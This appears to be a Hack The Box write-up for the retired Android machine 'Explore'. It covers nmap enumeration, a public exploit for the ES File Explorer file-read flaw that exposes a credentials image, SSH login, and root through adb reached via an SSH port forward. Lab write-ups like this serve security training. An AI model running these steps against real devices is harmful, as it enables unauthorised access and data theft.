Skip to content

Latest commit

 

History

History
143 lines (115 loc) · 3.41 KB

write-up-explore.md

File metadata and controls

143 lines (115 loc) · 3.41 KB
Raw

Explore

This is the write-up for the box Explore that got retired at the 30th October 2021. My IP address was 10.10.14.2 while I did this.

Let's put this in our hosts file:

10.10.10.247    explore.htb

Enumeration

Starting with a Nmap scan:

nmap -sC -sV -o nmap/explore.nmap 10.10.10.247

PORT     STATE    SERVICE VERSION
2222/tcp open     ssh     (protocol 2.0)
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
5555/tcp filtered freeciv

The SSH service is run with Banana Studio, which is an Android application and port 5555 is filtered.

Full TCP port scan:

nmap -p- 10.10.10.247

PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
42753/tcp open     unknown
59777/tcp open     unknown

Service scan on found ports:

nmap -p 42135,42753,59777 -sC -sV 10.10.10.247

42135/tcp open  http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
42753/tcp open  unknown
| fingerprint-strings:
|   GenericLines:
(...)
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

When researching the ports, the port 59777 is used by the Android app ES File Explorer and it has an Arbitrary File Read vulnerability.

Exploiting ES File Explorer (Port 59777)

The web service on port 59777 responds with a HTTP status code 500 Internal Server Error and the following message:

SERVER INTERNAL ERROR: Serve() returned a null response.

Downloading the exploit script with Searchsploit:

searchsploit -m android/remote/50070.py

Using the getDeviceInfo parameter of the script:

python3 50070.py getDeviceInfo 10.10.10.247

ftpRoot : /sdcard
ftpPort : 3721

Listing all files with the listFiles and listPics parameter:

python3 50070.py listFiles 10.10.10.247

python3 50070.py listPics 10.10.10.247

The picture creds.jpg sounds interesting, so it can be downloaded:

python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

It is a handwritten note with potential credentials:

Kristi:Kr1sT!5h@Rp3xPl0r3!

The credentials are working on the SSH service on port 2222:

ssh -p 2222 kristi@10.10.10.247

NOTE: The flag can be found in /storage/emulated/0/user.txt.

Privilege Escalation

When checking the open ports, the command ss -lnpt shows that port 5555 is listening on localhost. On an Android system this port is used by the Android Debug Bridge (adb).

Forwarding the port to our local client with the SSH command line:

ssh> -L 5555:localhost:5555
Forwarding port.

Connecting to the Android debug bridge:

adb connect localhost:5555

Listing all devices

adb devices -l

List of devices attached
emulator-5554          device product:android_x86_64 model:VMware_Virtual_Platform device:x86_64 transport_id:1
localhost:5555         device product:android_x86_64 model:VMware_Virtual_Platform device:x86_64 transport_id:2

Starting a shell on the device:

adb -s localhost:5555 shell

This starts a shell as the user shell which can escalate privileges to root!

x86_64:/ $ su -

NOTE: The flag can be found in /data/root.txt.